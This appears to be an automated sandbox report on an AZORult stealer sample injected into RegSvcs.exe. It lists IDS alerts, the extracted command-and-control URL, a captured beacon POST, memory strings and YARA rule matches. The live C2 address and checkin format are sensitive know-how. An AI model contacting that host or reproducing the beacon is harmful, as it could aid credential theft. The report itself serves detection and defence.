Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,	7_2_004111C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00414408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00414408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041158C FindFirstFileW,FindNextFileW,FindClose,	7_2_0041158C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00411590 FindFirstFileW,FindNextFileW,FindClose,	7_2_00411590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D9C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.7:49681 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.7:49681 -> 104.21.96.1:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://k1d5.icu/TP341/index.php

Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic

HTTP traffic detected: POST /TP341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: k1d5.icuContent-Length: 111Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 62 ec 47 14 8b 30 6d eb 26 66 9c 26 67 ea 45 70 9d 34 70 9d 3a 70 9d 34 70 9d 33 70 9d 34 10 8b 30 67 8b 31 11 8b 30 67 ed 26 66 9c 26 66 97 26 66 9a 26 66 97 26 66 9b 26 66 97 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b0bG0m&f&gEp4p:p4p3p40g10g&f&f&f&f&f&f

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_00418688 GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,

7_2_00418688

Source: global traffic

DNS traffic detected: DNS query: k1d5.icu

Source: unknown

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 15:28:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I4IjIcKFxqZjB0AHL2AyAfDfTrl8mtnlb9%2FW6ovTlkFwB162IXuI70ScMIanrperR2%2FcJaAOaQUj8rPXau7M1RqfQZFU4jaZH%2B1gRC4KAtfs%2FHOCBOgBufl6Aw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cb2002bd014363-EWRData Raw: 31 31 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c Data Ascii: 11d0<!DOCTYPE html> <html class="no-js" lang="en-US"> <head><title>Suspected phishing site | Cloudflar

Source: svchost.exe, 00000010.00000002.2084869197.000002B24F200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.16.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.16.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.16.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.16.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.16.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.16.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.16.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: A2h6QhZIKx.exe, lpIWQr.exe.0.dr	String found in binary or memory: http://insimsniffer.codeplex.com/project/feeds/rss?ProjectRSSFeed=codeplex%3a%2f%2frelease%2finsimsn
Source: A2h6QhZIKx.exe, 00000000.00000002.964259993.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json
Source: RegSvcs.exe, 00000007.00000002.889948878.00000000015EF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.889948878.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.889948878.0000000001598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://k1d5.icu/TP341/index.php
Source: RegSvcs.exe, 00000007.00000002.889948878.0000000001598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://k1d5.icu/TP341/index.phpk
Source: A2h6QhZIKx.exe, 00000000.00000002.962584566.0000000002661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.10.dr	String found in binary or memory: http://upx.sf.net
Source: svchost.exe, 00000011.00000002.1365011502.000002712CA13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000011.00000003.1364520650.000002712CA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365145051.000002712CA58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000011.00000003.1364520650.000002712CA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365145051.000002712CA58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000011.00000003.1364453146.000002712CA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365218394.000002712CA70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365180500.000002712CA63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364298426.000002712CA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365092091.000002712CA44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364234202.000002712CA6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364502585.000002712CA43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000011.00000003.1364520650.000002712CA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365145051.000002712CA58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000011.00000003.1364262502.000002712CA67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000011.00000002.1365218394.000002712CA70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364234202.000002712CA6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000011.00000003.1364520650.000002712CA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365145051.000002712CA58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000011.00000003.1364453146.000002712CA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365180500.000002712CA63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364298426.000002712CA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365036281.000002712CA2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000011.00000003.1364520650.000002712CA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365145051.000002712CA58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000011.00000002.1365199864.000002712CA68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364262502.000002712CA67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365036281.000002712CA2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000011.00000003.1364520650.000002712CA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365145051.000002712CA58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000011.00000003.1364520650.000002712CA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365145051.000002712CA58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000011.00000003.1364520650.000002712CA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365145051.000002712CA58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000011.00000002.1365180500.000002712CA63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364298426.000002712CA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365036281.000002712CA2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000011.00000002.1365074163.000002712CA41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000011.00000003.1364520650.000002712CA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365145051.000002712CA58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000011.00000002.1365180500.000002712CA63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364298426.000002712CA62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: A2h6QhZIKx.exe, 00000000.00000002.964259993.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://dotbit.me/a/
Source: svchost.exe, 00000011.00000003.1364542699.000002712CA31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000011.00000002.1365074163.000002712CA41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000011.00000002.1365180500.000002712CA63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364298426.000002712CA62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000011.00000002.1365092091.000002712CA44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364363628.000002712CA5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364502585.000002712CA43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000011.00000003.1364502585.000002712CA43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000011.00000003.1364520650.000002712CA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365145051.000002712CA58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000011.00000002.1365199864.000002712CA68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364262502.000002712CA67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365036281.000002712CA2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: edb.log.16.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000010.00000003.1203455172.000002B24F0C0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.16.dr, edb.log.16.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: qmgr.db.16.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: svchost.exe, 00000011.00000003.1364502585.000002712CA43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000011.00000003.1364485756.000002712CA49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364502585.000002712CA43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000011.00000002.1365055224.000002712CA38000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364485756.000002712CA49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1364502585.000002712CA43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000011.00000003.1364380455.000002712CA5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000011.00000002.1365036281.000002712CA2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000011.00000003.1364520650.000002712CA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365145051.000002712CA58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000011.00000003.1364520650.000002712CA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1365145051.000002712CA58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.964259993.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000002.964259993.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Code function: 11_2_0575A430	11_2_0575A430
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Code function: 11_2_0575A421	11_2_0575A421
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Code function: 11_2_05758790	11_2_05758790
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Code function: 11_2_05758358	11_2_05758358
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Code function: 11_2_05757F20	11_2_05757F20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00403B98 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00404E64 appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00404E3C appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 004062D8 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 004034E4 appears 36 times

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6448 -s 1784

Source: A2h6QhZIKx.exe, 00000000.00000002.962584566.0000000002754000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFlatForm.dll2 vs A2h6QhZIKx.exe
Source: A2h6QhZIKx.exe, 00000000.00000002.962584566.00000000027E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFlatForm.dll2 vs A2h6QhZIKx.exe
Source: A2h6QhZIKx.exe, 00000000.00000002.961315847.00000000008BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs A2h6QhZIKx.exe
Source: A2h6QhZIKx.exe, 00000000.00000000.831250561.0000000000262000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameuQFJ.exe: vs A2h6QhZIKx.exe
Source: A2h6QhZIKx.exe, 00000000.00000002.964259993.00000000036FD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs A2h6QhZIKx.exe
Source: A2h6QhZIKx.exe, 00000000.00000002.966209380.0000000004F50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFlatForm.dll2 vs A2h6QhZIKx.exe
Source: A2h6QhZIKx.exe, 00000000.00000002.966478719.00000000051F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs A2h6QhZIKx.exe
Source: A2h6QhZIKx.exe	Binary or memory string: OriginalFilenameuQFJ.exe: vs A2h6QhZIKx.exe

Source: A2h6QhZIKx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
